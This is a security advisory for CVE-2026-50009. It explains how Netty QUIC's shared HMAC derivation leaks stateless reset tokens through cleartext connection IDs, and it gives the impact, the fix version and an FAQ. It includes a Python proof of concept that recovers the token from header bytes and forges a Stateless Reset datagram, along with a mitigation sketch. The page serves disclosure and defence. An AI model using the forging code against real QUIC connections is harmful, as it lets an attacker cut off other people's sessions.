CVE-2026-50009: Netty QUIC stateless reset token material exposed through header-visible connection IDs
Summary
Netty QUIC exposes the stateless reset token on the network path when using the default HMAC-based connection-ID and stateless-reset-token generators. The reset token for the server's current source connection ID can be derived from bytes that appear, in cleartext, as the connection ID in QUIC packet headers after a source-CID rotation. An on-path attacker observing the headers can use the token to mount a denial of service by sending a spoofed Stateless Reset packet.
Details
The HMAC-signing connection ID generator (HmacSignQuicConnectionIdGenerator) and the reset token generator (HmacSignQuicResetTokenGenerator) both evaluate HMAC-SHA256 under the same JVM-wide static key (io.netty.handler.codec.quic.Hmac).
During source CID rotation (QuicheQuicChannel.newSourceConnectionIds), the current server source CID C is the HMAC input used to produce the next CID N. The stateless reset token for C is the first 16 bytes of HMAC(K, C). The next CID N is the first L bytes of that same digest, where L = |C| is the length of C in bytes.
Whenever L ≥ 16, the first 16 bytes of N are therefore exactly the stateless reset token for C. Connection IDs are carried unencrypted in both long and short QUIC packet headers, so an observer can read N from the headers and learn the reset token for C without decrypting any payload.
This directly violates RFC 9000, "Calculating a Stateless Reset Token" (https://datatracker.ietf.org/doc/html/rfc9000#name-calculating-a-stateless-res), which requires that the stateless reset token MUST be difficult to guess. The resulting capability is the one RFC 9000 warns about under "Stateless Reset Oracle" (https://datatracker.ietf.org/doc/html/rfc9000#name-stateless-reset-oracle): an attacker who learns a valid token for a connection can inject a reset, analogous to TCP RST injection.
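The overlap described above is easiest to see by modelling the two derivations side by side. The following Python is an added example written for this page, not Netty's code: it reproduces the construction the advisory describes (token = first 16 bytes of HMAC-SHA256(K, C); next CID = first |C| bytes of the same digest) with a constructed key and CID, shows that an observer who only sees N recovers the token for C with no knowledge of K, and includes the client-side detection check from RFC 9000 that makes the leaked token useful. It also shows that a CID shorter than 16 bytes still leaks the first |C| bytes of the token, which follows from the same construction. The domain-separated variant at the end is a generic mitigation sketch and is not a description of what Netty 4.2.15.Final actually changed.

```python
import hashlib
import hmac

# Constructed stand-in for the JVM-wide static HMAC key shared by both Netty generators
# (io.netty.handler.codec.quic.Hmac). The value is invented for this demo.
STATIC_KEY = bytes.fromhex("00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff")

RESET_TOKEN_LEN = 16  # RFC 9000: a stateless reset token is always 16 bytes
MIN_RESET_DATAGRAM = 21  # RFC 9000 10.3: 1 byte header + >=4 unpredictable bytes + 16-byte token


def _mac(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.sha256).digest()


def reset_token_for(cid: bytes, key: bytes = STATIC_KEY) -> bytes:
    """Model of the vulnerable token generator: first 16 bytes of HMAC-SHA256(K, C)."""
    return _mac(key, cid)[:RESET_TOKEN_LEN]


def next_cid_for(cid: bytes, key: bytes = STATIC_KEY) -> bytes:
    """Model of the vulnerable rotation step: N = first |C| bytes of the SAME digest."""
    return _mac(key, cid)[: len(cid)]


def token_bytes_from_header(observed_cid: bytes) -> bytes:
    """What an on-path observer learns about the token for C by reading N from a header:
    the whole token when |N| >= 16, otherwise the first |N| bytes of it."""
    return observed_cid[:RESET_TOKEN_LEN]


def exposed_token_bits(cid_len: int) -> int:
    """Bits of the 128-bit token revealed by one observed CID of the given length."""
    return 8 * min(cid_len, RESET_TOKEN_LEN)


def attack_recovers_full_token(current_cid: bytes, key: bytes = STATIC_KEY) -> bool:
    """Rotate, 'observe' N on the wire, and check whether the observed bytes alone
    reproduce the server's reset token for C. The attacker never touches `key`."""
    observed_n = next_cid_for(current_cid, key)
    return token_bytes_from_header(observed_n) == reset_token_for(current_cid, key)


def forge_stateless_reset(token: bytes) -> bytes:
    """Datagram shaped like RFC 9000 10.3: fixed bit 0x40 set, unpredictable filler,
    then the 16-byte token. Filler is constant here for determinism; the spec wants it
    unpredictable so the datagram is indistinguishable from a short-header packet."""
    return bytes([0x40 | 0x2A]) + b"\x2a" * 4 + token


def client_detects_stateless_reset(datagram: bytes, tokens_known_to_client: set) -> bool:
    """Client-side check from RFC 9000 10.3.1: the trailing 16 bytes of an otherwise
    unprocessable datagram are compared with the tokens the server has given the client
    (via the stateless_reset_token transport parameter or NEW_CONNECTION_ID frames).
    A real implementation compares in constant time."""
    return len(datagram) >= MIN_RESET_DATAGRAM and datagram[-RESET_TOKEN_LEN:] in tokens_known_to_client


def end_to_end(current_cid: bytes, key: bytes = STATIC_KEY) -> bool:
    """Full chain: the client legitimately holds the token for C; the attacker reads N
    from a header, forges a reset from its first 16 bytes, and the client accepts it."""
    tokens_client_holds = {reset_token_for(current_cid, key)}
    leaked = token_bytes_from_header(next_cid_for(current_cid, key))
    return client_detects_stateless_reset(forge_stateless_reset(leaked), tokens_client_holds)


# Mitigation sketch (generic; NOT a claim about the Netty 4.2.15.Final patch):
# domain-separate the two derivations so the two digests are unrelated.
def reset_token_for_fixed(cid: bytes, key: bytes = STATIC_KEY) -> bytes:
    return _mac(key, b"quic-reset-token\x00" + cid)[:RESET_TOKEN_LEN]


def next_cid_for_fixed(cid: bytes, key: bytes = STATIC_KEY) -> bytes:
    return _mac(key, b"quic-next-cid\x00" + cid)[: len(cid)]


def attack_recovers_full_token_fixed(current_cid: bytes, key: bytes = STATIC_KEY) -> bool:
    observed_n = next_cid_for_fixed(current_cid, key)
    return token_bytes_from_header(observed_n) == reset_token_for_fixed(current_cid, key)


if __name__ == "__main__":
    c = bytes(range(20))  # constructed 20-byte server source CID (20 is the QUIC maximum)
    print("vulnerable derivation, full token recovered from header:", attack_recovers_full_token(c))
    print("client accepts forged reset built from leaked bytes:", end_to_end(c))
    print("domain-separated derivation leaks token:", attack_recovers_full_token_fixed(c))
    for length in (8, 16, 20):
        print(f"|C|={length}: {exposed_token_bits(length)} of 128 token bits exposed")
```

Run as a script it prints the three outcomes and the exposure per CID length; the observer side (`token_bytes_from_header`, `forge_stateless_reset`) is deliberately written so it never receives the key, which is the point: the header bytes alone are sufficient.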
Impact
Information disclosure leading to denial of service. An on-path attacker can obtain the stateless reset token from the connection ID in cleartext packet headers and abruptly close the client side of the connection by sending a spoofed Stateless Reset datagram whose trailing 16 bytes are that token. The client accepts the reset as long as it still associates the token with a destination connection ID it has used and not yet retired (RFC 9000 Section 10.3.1); the effect is equivalent to TCP RST injection. Confidentiality and integrity of the protected payload are not affected.
Other sources
Netty is a network application framework for development of protocol servers and clients. Prior to version 4.2.15.Final, Netty QUIC exposes the stateless reset token on the network path when using the default HMAC-based connection-ID and stateless-reset-token generators. The reset token for the server's current source connection ID can be derived from bytes that appear as the connection ID in QUIC headers after a source-CID rotation. An on-path attacker observing the headers can use the token to perform a Denial of Service by sending a spoofed Stateless Reset packet. Version 4.2.15.Final patches the issue.
— MITRE
Frequently Asked Questions
What is the severity of CVE-2026-50009?
CVE-2026-50009 has a medium severity rating with a score of 4.8.
What vulnerability does CVE-2026-50009 represent?
CVE-2026-50009 is an information disclosure vulnerability in Netty QUIC: the stateless reset token for the server's current source connection ID is exposed in the cleartext connection ID that appears in packet headers after a source-CID rotation.
How do I fix CVE-2026-50009?
To fix CVE-2026-50009, upgrade to Netty version 4.2.15.Final or later.
What types of applications are affected by CVE-2026-50009?
CVE-2026-50009 affects applications using Netty QUIC prior to version 4.2.15.Final.
What can an attacker do with CVE-2026-50009?
An on-path attacker who observes the QUIC headers can read the stateless reset token and send a spoofed Stateless Reset datagram to the client, abruptly terminating the connection (denial of service). The leaked token does not allow decryption or modification of the connection's traffic.